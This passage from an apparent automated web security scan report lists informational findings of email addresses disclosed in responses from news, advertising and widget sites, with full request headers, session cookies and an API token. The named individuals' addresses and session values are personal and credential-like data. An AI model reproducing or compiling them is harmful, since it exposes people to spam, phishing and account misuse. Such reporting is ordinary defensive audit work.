HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:50:03 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Thu, 07 Apr 2011 07:05:43 GMT
Cache-Control: public, max-age=43200
X-Varnish: 1433541260
Age: 0
Via: 1.1 varnish
Content-Length: 31534

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...
13.15. http://cdn.js-kit.com/scripts/comments.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.js-kit.com
Path:   /scripts/comments.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/comments.js HTTP/1.1
Host: cdn.js-kit.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408244
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=259200
Content-Type: application/javascript
Age: 101183
Date: Sat, 09 Apr 2011 12:34:24 GMT
Last-Modified: Fri, 08 Apr 2011 08:24:24 GMT
Expires: Mon, 11 Apr 2011 08:32:06 GMT
Connection: keep-alive
Content-Length: 474074


...[SNIP]...
<support@js-kit.com>
...[SNIP]...
13.16. http://cdn.taboolasyndication.com/libtrc/hearst-wptz/rbox.en.4-6-12-44788.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /libtrc/hearst-wptz/rbox.en.4-6-12-44788.json

Issue detail

The following email address was disclosed in the response:

Request

GET /libtrc/hearst-wptz/rbox.en.4-6-12-44788.json HTTP/1.1
Host: cdn.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:46 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 06 Apr 2011 16:58:49 GMT
ETag: "7e8883-284-4a042e817c440"
Accept-Ranges: bytes
Content-Length: 644
Content-Type: text/plain; charset=UTF-8
Content-Language: en, en
Cache-Control: private, max-age=31536000
Age: 232813
Expires: Thu, 05 Apr 2012 19:50:33 GMT
Connection: Keep-Alive

trc_json_locale_data={"rbox":{"":{"MIME-Version":" 1.0","POT-Creation-Date":" 2009-06-03 19:30+0300","X-Poedit-SourceCharset":" utf-8","X-Poedit-Country":" ISRAEL","X-Poedit-Language":" Hebrew","Last-
...[SNIP]...
<info@taboola.com>
...[SNIP]...
13.17. http://cdnserve.a-feed.com/service/getFeed2.kickAction  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnserve.a-feed.com
Path:   /service/getFeed2.kickAction

Issue detail

The following email address was disclosed in the response:

Request

GET /service/getFeed2.kickAction?feedId=471563&as=62976 HTTP/1.1
Host: cdnserve.a-feed.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/xml;charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:29:52 GMT
Date: Sat, 09 Apr 2011 12:29:52 GMT
Connection: close
Content-Length: 176882

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:georss="http://www.georss.org/georss/"
...[SNIP]...
<managingEditor>wptzugc@hearst.com (wptz)</managingEditor>
...[SNIP]...
<webMaster>wptzugc@hearst.com (wptz)</webMaster>
...[SNIP]...
13.18. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The following email address was disclosed in the response:

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:08 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87675

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
ady flagged');
   } else {
       //alert("username: " + username +" url:" + url + " comment: " + comment);
       var request = 'http://clientapps.kickapps.com/hearst/comments/flagComment.php?as=62976&emails=ulocal@wptz.com&fromUserId=4054486&url='+escape(url)+'&comment='+escape(comment)+'&username='+usernameOfComment+'&t='+escape(t)+'&cId='+commentId;
       aObj = new JSONscriptRequest(request);
       aObj.buildScriptTag();

...[SNIP]...
13.19. http://kellwood.com/home.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /home.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /home.asp HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 11 Apr 2011 17:19:46 GMT
Content-Length: 16981

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Kellwood - H
...[SNIP]...
<a href="mailto:careers@kellwood.com" >
...[SNIP]...
<a href="mailto:corp_communications@kellwood.com">
...[SNIP]...
<a href="mailto:erin.haggerty@kellwood.com" >
...[SNIP]...
<a href="mailto:brenda.palmer@kellwood.com" >
...[SNIP]...
<a href="mailto:info@kellwood.com">info@kellwood.com</a>
...[SNIP]...
<a href="mailto:info@kellwood.com">info@kellwood.com</a>
...[SNIP]...
13.20. http://nmp.newsgator.com/NGBuzz/3656/load.ashx/buzz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/3656/load.ashx/buzz

Issue detail

The following email addresses were disclosed in the response:

Request

GET /NGBuzz/3656/load.ashx/buzz HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Mon, 04 Jan 2010 16:40:00 GMT
ETag: oV66A7aHivLO3pYsL+Y+aQ==
Vary: Accept-Encoding
Content-Type: */*; charset=utf-8
Cache-Control: public, max-age=358
Date: Sat, 09 Apr 2011 12:29:47 GMT
Connection: close
Content-Length: 99595

/*
* All comments have been removed from these files. To view licenses, attributions and comments see this url: http://nmp.newsgator.com/NGBuzz/3656/load.ashx/buzz/unpacked
*/

(function(){if(!w
...[SNIP]...
<span class="ng_FormExample">(someone@example.com)</span>
...[SNIP]...
<span class="ng_FormExample">(me@example.net)</span>
...[SNIP]...
13.21. http://nmp.newsgator.com/NGBuzz/buzz.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The following email address was disclosed in the response:

Request

GET /NGBuzz/buzz.ashx?load=data&apiToken=291A707AAEE04CCC9A00B3B498001025&buzzId=216931&_dsrId=ngbuzz_216931_data HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Sat, 09 Apr 2011 12:09:30 GMT
ETag: 634379261703808200
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: public, max-age=282
Date: Sat, 09 Apr 2011 12:33:16 GMT
Connection: close
Content-Length: 1450

window.ng_scriptload({id:'ngbuzz_216931_data',status:200,statusText:'200 OK',response:{Data:[{Description:'A Vermont legislative committee has give preliminary approval to a survey that establishes on
...[SNIP]...
eedName:'RutlandHerald.com: Vermont News',Title:'Vt. lawmaker: Health care poll findings tainted',HtmlUrl:'http://www.rutlandherald.com/article/20110409/NEWS03/704099894/1004/NEWS03',Guid:null,Author:'randal.smathers@rutlandherald.com',EnclosureUrl:'',EnclosureType:'',FeedId:1231843,CommentRss:null}]}});
13.22. http://valtira.com/page/1/valtira-Marketing-Tools.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://valtira.com
Path:   /page/1/valtira-Marketing-Tools.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /page/1/valtira-Marketing-Tools.jsp HTTP/1.1
Host: valtira.com
Proxy-Connection: keep-alive
Referer: http://valtira.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VLTSID=rHTkRVaEF2pqO; JSESSIONID=3C47A68301185EB621E479EA2B81A26C.valtira-com-2; VLTALT=325428#valtira.com; __utmz=152738878.1302308422.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=152738878.105465705.1302308422.1302308422.1302308422.1; __utmc=152738878; __utmb=152738878.1.10.1302308422

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:20:34 GMT
Server: Apache
Set-Cookie: VLTALT=325428#valtira.com; Domain=valtira.com; Expires=Tue, 06-Apr-2021 00:20:34 GMT; Path=/
Cache-Control: private,no-cache,no-store,must-revalidate
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19852


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en
...[SNIP]...
<a href="mailto:contact@valtira.com" target="ext">contact@valtira.com</a>
...[SNIP]...
13.23. http://vermontopia.com/scripts/jquery/jcrop/js/jquery.Jcrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vermontopia.com
Path:   /scripts/jquery/jcrop/js/jquery.Jcrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/jquery/jcrop/js/jquery.Jcrop.js HTTP/1.1
Host: vermontopia.com
Proxy-Connection: keep-alive
Referer: http://wcax.upickem.net/engine/Splash.aspx?contestid=17178
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=176143781.1302352254.1.1.utmcsr=wcax.com|utmccn=(referral)|utmcmd=referral|utmcct=/Global/category.asp; __utma=176143781.1407274445.1302352252.1302352252.1302352252.1; __utmc=176143781; __utmb=176143781.1.10.1302352252

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:28:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 02 Aug 2010 16:07:49 GMT
ETag: "2da99c4-69f4-48cd966e63f40"
Accept-Ranges: bytes
Content-Length: 27124
Content-Type: application/javascript

/**
* jquery.Jcrop.js v0.9.8
* jQuery Image Cropping Plugin
* @author Kelly Hallman <khallman@gmail.com>
* Copyright (c) 2008-2009 Kelly Hallman - released under MIT License {{{
*
* Permi
...[SNIP]...
13.24. http://vermontopia.com/scripts/jquery/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vermontopia.com
Path:   /scripts/jquery/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/jquery/jquery.cookie.js HTTP/1.1
Host: vermontopia.com
Proxy-Connection: keep-alive
Referer: http://wcax.upickem.net/engine/Splash.aspx?contestid=17178
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=176143781.1302352254.1.1.utmcsr=wcax.com|utmccn=(referral)|utmcmd=referral|utmcct=/Global/category.asp; __utma=176143781.1407274445.1302352252.1302352252.1302352252.1; __utmc=176143781; __utmb=176143781.1.10.1302352252

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:28:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 02 Aug 2010 16:07:49 GMT
ETag: "2da9a9b-10f5-48cd966e63f40"
Accept-Ranges: bytes
Content-Length: 4341
Content-Type: application/javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
13.25. http://widgets.outbrain.com/outbrainWidget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.outbrain.com
Path:   /outbrainWidget.js

Issue detail

The following email address was disclosed in the response:

Request

GET /outbrainWidget.js HTTP/1.1
Host: widgets.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:46 GMT
Server: Apache
Last-Modified: Mon, 04 Apr 2011 13:37:18 GMT
ETag: "100aad-22fdd-4a017dbbaff80"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Cache-Control: private, max-age=604800
Age: 0
Expires: Sat, 16 Apr 2011 12:30:46 GMT
Connection: Keep-Alive
Content-Length: 143325

window.OB_releaseVer="36720";var ObStartTime=typeof ObStartTime!="undefined"?ObStartTime:(new Date).getTime(),outbrain_browsers=typeof outbrain_browsers=="object"?outbrain_browsers:new (function(){thi
...[SNIP]...
<a href='mailto:feedback@outbrain.com'>feedback@outbrain.com</a>
...[SNIP]...
13.26. http://widgets.twimg.com/j/2/widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.js

Issue detail

The following email address was disclosed in the response:

Request

GET /j/2/widget.js HTTP/1.1
Host: widgets.twimg.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "d8afd562618ced4f96c0aa2a2ed3408e"
If-Modified-Since: Thu, 31 Mar 2011 00:18:44 GMT

Response

HTTP/1.0 200 OK
x-amz-id-2: rzm9dGgAc5lJdRGCHK4nrnAFwPlltUyVpUrQ9iX7OHi8BFbjAlpUNEe87IlNvl7D
x-amz-request-id: 85FCB1BBFD56E9D4
Date: Sat, 09 Apr 2011 05:20:21 GMT
Last-Modified: Fri, 08 Apr 2011 20:34:17 GMT
ETag: "8f109f7ba100454bc391fc07377c1aed"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 31383
Server: AmazonS3
Age: 25826
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 55c705022ed506e1333205c1f465735dae4704a8cf523aeb321eaa06d98e722167ff858536ad87b5
Via: 1.0 04548871feef153485c789be4f01c614.cloudfront.net:11180 (CloudFront), 1.0 b112099a211ab81d3a50756cb5a11036.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...
13.27. http://www.acquisio.com/js_capture_source/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acquisio.com
Path:   /js_capture_source/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js_capture_source/jquery.cookie.js HTTP/1.1
Host: www.acquisio.com
Proxy-Connection: keep-alive
Referer: http://www.pagevester.com/en/product/Google-Website-Optimizer.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:18 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 04 Jun 2010 14:03:44 GMT
ETag: "1e442f-1096-ca817000"
Accept-Ranges: bytes
Content-Length: 4246
Connection: close
Content-Type: application/x-javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
13.28. http://www.clickability.com/templates/Corp_Scripts_Template.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickability.com
Path:   /templates/Corp_Scripts_Template.js

Issue detail

The following email address was disclosed in the response:

Request

GET /templates/Corp_Scripts_Template.js HTTP/1.1
Host: www.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vmVisitorState=0; vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; click_mobile=0

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b1
Content-Type: text/html;charset=utf-8
Expires: Sat, 09 Apr 2011 00:18:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:05 GMT
Connection: close
Set-Cookie: vmVisitorState=0; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: click_mobile=0
Content-Length: 6708

function commentReturnFunction(){
   var obj = document.getElementById('commentPost');
   var message;
   
   if(Comment.error)
       var status = Comment.error;
   else
       var status = Comment.status;    

   i
...[SNIP]...
string represents an atom (basically a series of non-special characters.) */
   
   var atom=validChars + '+';
   
   /* The following string represents one word in the typical username.
   For example, in john.doe@somewhere.com, john and doe are words.
   Basically, a word is either an atom or quoted string. */
   
   var word="(" + atom + "|" + quotedUser + ")";
   
   // The following pattern describes the structure of the user
...[SNIP]...
13.29. http://www.foxnews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxnews.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 90s
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=46
Date: Mon, 11 Apr 2011 16:21:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 93610

<!--[if IE 5]> Vignette StoryServer 5.0 Mon Apr 11 12:19:11 2011 <![endif]-->

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional
...[SNIP]...
<a href="mailto:newsmanager@foxnews.com">
...[SNIP]...
13.30. http://www.foxnews.com/politics/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxnews.com
Path:   /politics/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /politics/index.html HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: surround=undefined; rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540668835%3B%20omtr_lv%3D1302538868837%7C1397146868837%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540668837%3B%20s_nr%3D1302538868843%7C1305130868843%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dfnc%253Aroot%253Aroot%253Achannel%255E%255EPolitics%255E%255Efnc%253Aroot%253Aroot%253Achannel%2520%257C%2520Politics%255E%255E%3B%20s_sq%3Dfoxnews%253D%252526pid%25253Dfnc%2525253Aroot%2525253Aroot%2525253Achannel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.foxnews.com/politics/index.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=103
Date: Mon, 11 Apr 2011 16:21:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 97734

